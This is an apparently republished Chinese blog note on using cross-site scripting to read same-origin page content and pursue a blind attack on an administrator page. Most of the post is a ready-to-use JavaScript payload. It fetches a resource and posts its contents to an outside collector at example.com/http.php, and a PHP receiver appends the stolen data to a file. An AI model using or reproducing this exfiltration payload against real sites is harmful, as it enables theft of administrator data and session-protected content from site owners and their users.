js讀取其他網頁內容(同源)

本文轉載自查看原文 2020-07-16 17:57 884 筆記/ web安全/ 網絡安全

通過xss第一次取得網頁內容，然后獲取到管理員賬號頁面進行二次盲打。js需要保留script部分其余去除。

<html><p id='d1'></p>
<script>
function get(url) {
    try {
        var req = new XMLHttpRequest();
        req.open('GET', url, false);
        req.send(null);
        if(req.status == 200)
            return req.responseText;
    } catch(err) {
    }
    return null;
}
function post(url,content){
    var req = new XMLHttpRequest();
    req.open("POST", url, true);
    var formData = new FormData();
    formData.append("cc", content);
    req.send(formData);
}
var role = get('/static/e.js;');
post('http://example.com/http.php',escape(role));
document.getElementById("d1").innerHTML=role.length;
</script></html>

http.php 獲取到的內容寫入save.txt

<?php
file_put_contents('save.txt', $_REQUEST["cc"]."\n",FILE_APPEND);
print("ok");

來源

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 java讀取網頁內容通過js修改網頁內容任意修改網頁內容JS代碼怎樣抓取網頁內容利用socket與ssl模塊讀取網頁內容網頁內容導出word/excel的js代碼 js，css控制網頁內容不讓選中和復制使用JS網頁內容保存為PDF 【html】css、js實現網頁內容禁止選中 Golang: 抓取網頁內容